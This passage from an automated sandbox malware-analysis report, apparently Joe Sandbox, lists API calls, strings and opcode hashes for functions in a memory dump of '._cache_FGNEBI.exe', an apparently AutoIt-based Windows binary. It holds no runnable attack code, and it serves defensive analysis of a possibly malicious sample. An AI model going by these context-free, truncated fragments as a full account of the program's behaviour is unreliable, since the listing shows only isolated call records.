                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E058F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 458326420-0
                                                                                                                        • Opcode ID: 9b0c1819d2e9c8a09b8dc5c5396fb7802aa1d2fed4de52b1db384ac04b991c34
                                                                                                                        • Instruction ID: aee3558644732c8619dbbeafc190fdf05ee8bb00ffe034f852f52562b1bddacc
                                                                                                                        • Opcode Fuzzy Hash: 9b0c1819d2e9c8a09b8dc5c5396fb7802aa1d2fed4de52b1db384ac04b991c34
                                                                                                                        • Instruction Fuzzy Hash: 2271CCB49053418EC708DF6BA891794BBA5F7893477946EEED02AB7361DBB0484CCF21
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                        • Opcode ID: d243b5128fb36e7ef71698c3d24e929bc12dca7bf70de97904fd93f4794910d6
                                                                                                                        • Instruction ID: a32ae8153c9af4c222c0a3ceff46ef434fec278f55527508a3cf4a886276a365
                                                                                                                        • Opcode Fuzzy Hash: d243b5128fb36e7ef71698c3d24e929bc12dca7bf70de97904fd93f4794910d6
                                                                                                                        • Instruction Fuzzy Hash: 51416B31A043549BCF159B6489A1FBF7FA2DB55300F284565EA86FB283D621CDC287B1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
                                                                                                                        • String ID: 0.0.0.0
                                                                                                                        • API String ID: 856254489-3771769585
                                                                                                                        • Opcode ID: a46c9d3ae2e8111dd92018f30c031e968a6422fcbc0969092dfce291d9a70b4c
                                                                                                                        • Instruction ID: cd4318a60cadfd501d38816d907f12015246be8a08cedba699d4c3a1b698f366
                                                                                                                        • Opcode Fuzzy Hash: a46c9d3ae2e8111dd92018f30c031e968a6422fcbc0969092dfce291d9a70b4c
                                                                                                                        • Instruction Fuzzy Hash: 7E11E035704308DFCB04EB65D992E69B3A9AF84710B148099F646EF391DAB0ED81CBB0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E03CF1
                                                                                                                          • Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA
                                                                                                                          • Part of subcall function 00D93A67: SHGetMalloc.SHELL32(00D93C31), ref: 00D93A7D
                                                                                                                          • Part of subcall function 00D93A67: SHGetDesktopFolder.SHELL32(?), ref: 00D93A8F
                                                                                                                          • Part of subcall function 00D93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00D93AD2
                                                                                                                          • Part of subcall function 00D93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00E522E8,?), ref: 00D93B65
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 2727075218-3081909835
                                                                                                                        • Opcode ID: c3643a0510daa02e121d27fd3a12eb3546e024feb2dd679177d9a104581a4398
                                                                                                                        • Instruction ID: cb54c469c35e59604eae24a54fe0f52ed3f71a8a99d6d1d4b8fb572a35aeea28
                                                                                                                        • Opcode Fuzzy Hash: c3643a0510daa02e121d27fd3a12eb3546e024feb2dd679177d9a104581a4398
                                                                                                                        • Instruction Fuzzy Hash: 1D11CA71A00288ABCF05DFE4D8056DEBBF9EF45704F00800AE411BB281CBB45A498BB1
                                                                                                                        Strings
                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00E034AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                        • Opcode ID: d30ab5718113fea2974b23d334bb9054dd6ebb7797a9e2d4a4d337f355a14033
                                                                                                                        • Instruction ID: a503390be8e7045931a12d79e78697062fc05ab9b9462f6c96631bac9ddae99e
                                                                                                                        • Opcode Fuzzy Hash: d30ab5718113fea2974b23d334bb9054dd6ebb7797a9e2d4a4d337f355a14033
                                                                                                                        • Instruction Fuzzy Hash: 96F0FF75944209AA8F15EEB4D8919FFB7BCAE10314F108526B866A2182EB749B09DB31
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DD6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00DD685E,?,?,?,00E04A5C,00E2E448,00000003,?,?), ref: 00DD66E2
                                                                                                                        • WriteFile.KERNEL32(?,?,",00000000,00000000,?,?,?,00E04A5C,00E2E448,00000003,?,?,00D94C44,?,?), ref: 00DD686C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$PointerWrite
                                                                                                                        • String ID: "
                                                                                                                        • API String ID: 539440098-357034475
                                                                                                                        • Opcode ID: 9e9e78adccd79794a4695632b51a33fce172f59e508be519a5797cbc346f5552
                                                                                                                        • Instruction ID: 35379eb5a59d19d71f97848af561ad4ea49b644b454aa04143d2411595a12ec5
                                                                                                                        • Opcode Fuzzy Hash: 9e9e78adccd79794a4695632b51a33fce172f59e508be519a5797cbc346f5552
                                                                                                                        • Instruction Fuzzy Hash: 5CE04636000218BBDB20AF94DC05FCABBB8EB08350F00451AF941A5110D7B1EA149BA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c61e6eea5268ab591bb52e7714effa13a7815440ef7c60ee8322ff0cf985a41f
                                                                                                                        • Instruction ID: 6a5d4b25cd69200a58075e25a7afe48e0cbe90d939909dd32f30433c4d31cf9e
                                                                                                                        • Opcode Fuzzy Hash: c61e6eea5268ab591bb52e7714effa13a7815440ef7c60ee8322ff0cf985a41f
                                                                                                                        • Instruction Fuzzy Hash: 0051C5316043019FCB18EF68D491BAA77E5EF89314F04856DF99A9B2D2DB30E845CB71
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00DE8074
                                                                                                                        • GetForegroundWindow.USER32 ref: 00DE807A
                                                                                                                          • Part of subcall function 00DE6B19: GetWindowRect.USER32(?,?), ref: 00DE6B2C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CursorForegroundRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1066937146-0
                                                                                                                        • Opcode ID: 8a278740ccb7577900f408b930ff3b8bf5769d664b35ce7f518df9fd8895475b
                                                                                                                        • Instruction ID: e673d5d2a20fd7269f8c884b6e6d4b30885e677d04d689b948ef9f58e52b40fa
                                                                                                                        • Opcode Fuzzy Hash: 8a278740ccb7577900f408b930ff3b8bf5769d664b35ce7f518df9fd8895475b
                                                                                                                        • Instruction Fuzzy Hash: 1D313B75A00208AFDF00EFA5CC81AEEB7B8FF14314F10442AE946A7251DB34AE45DBB0
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00E0DB31
                                                                                                                        • IsWindow.USER32(00000000), ref: 00E0DB6B
                                                                                                                          • Part of subcall function 00D91F04: GetForegroundWindow.USER32 ref: 00D91FBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Foreground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 62970417-0
                                                                                                                        • Opcode ID: f739715dc1ba71e269a730bf01da09a5953fbdf61b9cd37bb98fbe7dd06cda7c
                                                                                                                        • Instruction ID: 10f962c405d661a4ea95b7c3bde7b72acf96ed8a9cc03169586f1bc11add7c95
                                                                                                                        • Opcode Fuzzy Hash: f739715dc1ba71e269a730bf01da09a5953fbdf61b9cd37bb98fbe7dd06cda7c
                                                                                                                        • Instruction Fuzzy Hash: 51218C72600206AEDF11ABB5CC81BFE77AADF80788F014429F95A97181DA70EA059B70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D91952
                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DCE344
                                                                                                                        • _strlen.LIBCMT ref: 00DCE34F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2777139624-0
                                                                                                                        • Opcode ID: c05dba99c6f1bd26de5f873e8d39b439cf8202d61274ba774ccc1a04ab62037c
                                                                                                                        • Instruction ID: c954ead8362b09c6a3578b0d066d02658a5570150fd9a3153736f47f36412d10
                                                                                                                        • Opcode Fuzzy Hash: c05dba99c6f1bd26de5f873e8d39b439cf8202d61274ba774ccc1a04ab62037c
                                                                                                                        • Instruction Fuzzy Hash: 5B11C671600206ABDF05BFA9DC86EFF7BA8DF45340B00443EF606DB192DE64A84697B0
                                                                                                                        APIs
                                                                                                                        • 74B1C8D0.UXTHEME ref: 00D936E6
                                                                                                                          • Part of subcall function 00DB2025: __lock.LIBCMT ref: 00DB202B
                                                                                                                          • Part of subcall function 00D932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D932F6
                                                                                                                          • Part of subcall function 00D932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D9330B
                                                                                                                          • Part of subcall function 00D9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D9376D
                                                                                                                          • Part of subcall function 00D9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00D9377F
                                                                                                                          • Part of subcall function 00D9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00E51120,C:\Users\user\Desktop\._cache_FGNEBI.exe,00E51124,?,?), ref: 00D937EE
                                                                                                                          • Part of subcall function 00D9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00D93860
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00D93726
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3809921791-0
                                                                                                                        • Opcode ID: 1051f8cce441802444c1000d020bb3ea96b5bd98c92e390f71d6bd1c87b7794a
                                                                                                                        • Instruction ID: 4d0f2825fecdd573cfbbd620aad76984905ef14220f3522ee2d09946a9c7e3fa
                                                                                                                        • Opcode Fuzzy Hash: 1051f8cce441802444c1000d020bb3ea96b5bd98c92e390f71d6bd1c87b7794a
                                                                                                                        • Instruction Fuzzy Hash: 491190719083419FC704EF6ADC45A5EBBE8FB85711F004D1EF445972B1DB709548CBA2
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00D94C2B,?,?,?,?,00D9BE63), ref: 00D94BB6
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00D94C2B,?,?,?,?,00D9BE63), ref: 00E04972
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: d6415c48c381aba5df27baffcf8d708a22a9590a94c7c866b3c7837a8d35155a
                                                                                                                        • Instruction ID: dd9430b6a789d637c6d28010d67d391b618f0f5d955c2f5ef29fdd3d76776a52
                                                                                                                        • Opcode Fuzzy Hash: d6415c48c381aba5df27baffcf8d708a22a9590a94c7c866b3c7837a8d35155a
                                                                                                                        • Instruction Fuzzy Hash: BB019670248308BEF7245E18CD8AF6637DCEB1576CF148315BAE46A1E1C6B05C45CB20
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF282
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF2A6
                                                                                                                          • Part of subcall function 00DAF2D0: _memmove.LIBCMT ref: 00DAF307
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3033907384-0
                                                                                                                        • Opcode ID: 990b77f08e754bd3883a9937fbe4ae62826619688a765290b021b6f28449d9eb
                                                                                                                        • Instruction ID: 30f7a709ca4dd859720b6683b0276b85a4d3192896c43421c51e820a62e26ab9
                                                                                                                        • Opcode Fuzzy Hash: 990b77f08e754bd3883a9937fbe4ae62826619688a765290b021b6f28449d9eb
                                                                                                                        • Instruction Fuzzy Hash: 15F04FB6105114BFAB14AFA6DC44DBB7FADEF8A3607008066FD09CA111DA31DC018675
                                                                                                                        APIs
                                                                                                                        • ___lock_fhandle.LIBCMT ref: 00DBF7D9
                                                                                                                        • __close_nolock.LIBCMT ref: 00DBF7F2
                                                                                                                          • Part of subcall function 00DB886A: __getptd_noexit.LIBCMT ref: 00DB886A
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1046115767-0
                                                                                                                        • Opcode ID: af3bf1d6e2c15c5a79a16809afa9290faba08a1a9111cf074b0854ee3ab524eb
                                                                                                                        • Instruction ID: cdb271135fa541eb64c0324e7b2ff46f2e8163f6c790b697fdbaa15775e30bb9
                                                                                                                        • Opcode Fuzzy Hash: af3bf1d6e2c15c5a79a16809afa9290faba08a1a9111cf074b0854ee3ab524eb
